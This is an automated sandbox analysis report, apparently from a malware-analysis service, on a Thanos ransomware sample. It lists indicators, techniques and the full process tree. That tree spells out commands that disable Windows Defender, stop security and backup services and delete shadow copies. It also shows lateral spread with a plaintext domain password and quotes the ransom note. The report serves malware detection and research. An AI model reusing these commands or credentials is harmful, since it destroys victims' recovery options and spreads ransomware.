6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47

Resubmissions

04-11-2021 14:41

211104-r2dv8agha4 10

27-01-2021 22:14

210127-cr6bjqfx2e 10

Analysis

max time kernel
197s
max time network
140s
platform
windows10_x64
resource
win10-en-20210920
submitted
04-11-2021 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

thanos-cleaned.exe
Size

92KB
MD5

fe7dcc0f74e152a78963d560b2e3d148
SHA1

f9cf1dd1a7e8b2dffc9e0195685cef5a625832ea
SHA256

6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47
SHA512

a1d2de8abf7e56a2c29bfa38d0ae23584db2174ec8b14c6da3220e1c52ad52861714f8c363be843d16cdf13a22e0b74c16a1cb684ba102f132b09133338a169a

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 2 IoCs

flow	pid	Process
31	6140	mshta.exe
33	6140	mshta.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4748	5ivji2sf.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\DisableResolve.tiff.crypted	thanos-cleaned.exe
File opened for modification	C:\Users\Admin\Pictures\DisableResolve.tiff	thanos-cleaned.exe
File created	C:\Users\Admin\Pictures\ResetUnregister.raw.crypted	thanos-cleaned.exe
File created	C:\Users\Admin\Pictures\UnblockFormat.raw.crypted	thanos-cleaned.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	thanos-cleaned.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	thanos-cleaned.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	thanos-cleaned.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3704	vssadmin.exe
4832	vssadmin.exe
3664	vssadmin.exe
4484	vssadmin.exe
2164	vssadmin.exe
4236	vssadmin.exe
5680	vssadmin.exe
648	vssadmin.exe
5628	vssadmin.exe
1824	vssadmin.exe
4492	vssadmin.exe
4372	vssadmin.exe
348	vssadmin.exe
376	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4744	taskkill.exe
1084	taskkill.exe
4112	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4056	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
4024	powershell.exe
4024	powershell.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
4024	powershell.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2856	thanos-cleaned.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe
Token: 36	4024	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeIncreaseQuotaPrivilege	1736	powershell.exe
Token: SeSecurityPrivilege	1736	powershell.exe
Token: SeTakeOwnershipPrivilege	1736	powershell.exe
Token: SeLoadDriverPrivilege	1736	powershell.exe
Token: SeSystemProfilePrivilege	1736	powershell.exe
Token: SeSystemtimePrivilege	1736	powershell.exe
Token: SeProfSingleProcessPrivilege	1736	powershell.exe
Token: SeIncBasePriorityPrivilege	1736	powershell.exe
Token: SeCreatePagefilePrivilege	1736	powershell.exe
Token: SeBackupPrivilege	1736	powershell.exe
Token: SeRestorePrivilege	1736	powershell.exe
Token: SeShutdownPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeSystemEnvironmentPrivilege	1736	powershell.exe
Token: SeRemoteShutdownPrivilege	1736	powershell.exe
Token: SeUndockPrivilege	1736	powershell.exe
Token: SeManageVolumePrivilege	1736	powershell.exe
Token: 33	1736	powershell.exe
Token: 34	1736	powershell.exe
Token: 35	1736	powershell.exe
Token: 36	1736	powershell.exe
Token: SeIncreaseQuotaPrivilege	948	powershell.exe
Token: SeSecurityPrivilege	948	powershell.exe
Token: SeTakeOwnershipPrivilege	948	powershell.exe
Token: SeLoadDriverPrivilege	948	powershell.exe
Token: SeSystemProfilePrivilege	948	powershell.exe
Token: SeSystemtimePrivilege	948	powershell.exe
Token: SeProfSingleProcessPrivilege	948	powershell.exe
Token: SeIncBasePriorityPrivilege	948	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe
2856	thanos-cleaned.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
6140	mshta.exe
6140	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2856 wrote to memory of 4024	2856	thanos-cleaned.exe	69
PID 2856 wrote to memory of 4024	2856	thanos-cleaned.exe	69
PID 2856 wrote to memory of 2896	2856	thanos-cleaned.exe	72
PID 2856 wrote to memory of 2896	2856	thanos-cleaned.exe	72
PID 2856 wrote to memory of 1736	2856	thanos-cleaned.exe	74
PID 2856 wrote to memory of 1736	2856	thanos-cleaned.exe	74
PID 2856 wrote to memory of 360	2856	thanos-cleaned.exe	76
PID 2856 wrote to memory of 360	2856	thanos-cleaned.exe	76
PID 2856 wrote to memory of 2528	2856	thanos-cleaned.exe	78
PID 2856 wrote to memory of 2528	2856	thanos-cleaned.exe	78
PID 2856 wrote to memory of 948	2856	thanos-cleaned.exe	80
PID 2856 wrote to memory of 948	2856	thanos-cleaned.exe	80
PID 2856 wrote to memory of 1444	2856	thanos-cleaned.exe	82
PID 2856 wrote to memory of 1444	2856	thanos-cleaned.exe	82
PID 2856 wrote to memory of 2136	2856	thanos-cleaned.exe	83
PID 2856 wrote to memory of 2136	2856	thanos-cleaned.exe	83
PID 2856 wrote to memory of 3680	2856	thanos-cleaned.exe	87
PID 2856 wrote to memory of 3680	2856	thanos-cleaned.exe	87
PID 2856 wrote to memory of 2156	2856	thanos-cleaned.exe	114
PID 2856 wrote to memory of 2156	2856	thanos-cleaned.exe	114
PID 2856 wrote to memory of 3760	2856	thanos-cleaned.exe	89
PID 2856 wrote to memory of 3760	2856	thanos-cleaned.exe	89
PID 2856 wrote to memory of 3284	2856	thanos-cleaned.exe	91
PID 2856 wrote to memory of 3284	2856	thanos-cleaned.exe	91
PID 2856 wrote to memory of 64	2856	thanos-cleaned.exe	93
PID 2856 wrote to memory of 64	2856	thanos-cleaned.exe	93
PID 2856 wrote to memory of 2212	2856	thanos-cleaned.exe	94
PID 2856 wrote to memory of 2212	2856	thanos-cleaned.exe	94
PID 2856 wrote to memory of 2640	2856	thanos-cleaned.exe	95
PID 2856 wrote to memory of 2640	2856	thanos-cleaned.exe	95
PID 2856 wrote to memory of 1556	2856	thanos-cleaned.exe	112
PID 2856 wrote to memory of 1556	2856	thanos-cleaned.exe	112
PID 2856 wrote to memory of 2320	2856	thanos-cleaned.exe	110
PID 2856 wrote to memory of 2320	2856	thanos-cleaned.exe	110
PID 2856 wrote to memory of 2412	2856	thanos-cleaned.exe	97
PID 2856 wrote to memory of 2412	2856	thanos-cleaned.exe	97
PID 2856 wrote to memory of 1684	2856	thanos-cleaned.exe	98
PID 2856 wrote to memory of 1684	2856	thanos-cleaned.exe	98
PID 2856 wrote to memory of 1200	2856	thanos-cleaned.exe	99
PID 2856 wrote to memory of 1200	2856	thanos-cleaned.exe	99
PID 2856 wrote to memory of 424	2856	thanos-cleaned.exe	106
PID 2856 wrote to memory of 424	2856	thanos-cleaned.exe	106
PID 2856 wrote to memory of 3112	2856	thanos-cleaned.exe	101
PID 2856 wrote to memory of 3112	2856	thanos-cleaned.exe	101
PID 2856 wrote to memory of 4128	2856	thanos-cleaned.exe	103
PID 2856 wrote to memory of 4128	2856	thanos-cleaned.exe	103
PID 2856 wrote to memory of 4184	2856	thanos-cleaned.exe	115
PID 2856 wrote to memory of 4184	2856	thanos-cleaned.exe	115
PID 2212 wrote to memory of 4216	2212	net.exe	251
PID 2212 wrote to memory of 4216	2212	net.exe	251
PID 2856 wrote to memory of 4272	2856	thanos-cleaned.exe	116
PID 2856 wrote to memory of 4272	2856	thanos-cleaned.exe	116
PID 2640 wrote to memory of 4288	2640	net.exe	249
PID 2640 wrote to memory of 4288	2640	net.exe	249
PID 1556 wrote to memory of 4360	1556	net.exe	117
PID 1556 wrote to memory of 4360	1556	net.exe	117
PID 2856 wrote to memory of 4376	2856	thanos-cleaned.exe	247
PID 2856 wrote to memory of 4376	2856	thanos-cleaned.exe	247
PID 2320 wrote to memory of 4412	2320	net.exe	246
PID 2320 wrote to memory of 4412	2320	net.exe	246
PID 2856 wrote to memory of 4432	2856	thanos-cleaned.exe	118
PID 2856 wrote to memory of 4432	2856	thanos-cleaned.exe	118
PID 2412 wrote to memory of 4500	2412	net.exe	243
PID 2412 wrote to memory of 4500	2412	net.exe	243

C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
"C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:4288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:1684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:1200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:4744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:3112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:4832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4960
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:4668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5096
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:4596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:4648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:4600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:2300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5980
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4672
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:4576
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5680
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3704
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:648
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4492
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4372
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:348
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4832
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3664
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2164
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4484
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:376
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5628
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1824
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:1084
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4112
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4744
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5584
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1384
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4724
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.1.46 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:4336
- C:\Users\Admin\AppData\Local\Temp\5ivji2sf.exe
  "C:\Users\Admin\AppData\Local\Temp\5ivji2sf.exe" \10.127.1.46 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
  2⤵
  - Executes dropped EXE
  PID:4748
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4700
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetWindowsHookEx
  PID:6140
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5204
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4056
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
  2⤵
  PID:1368
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:5204

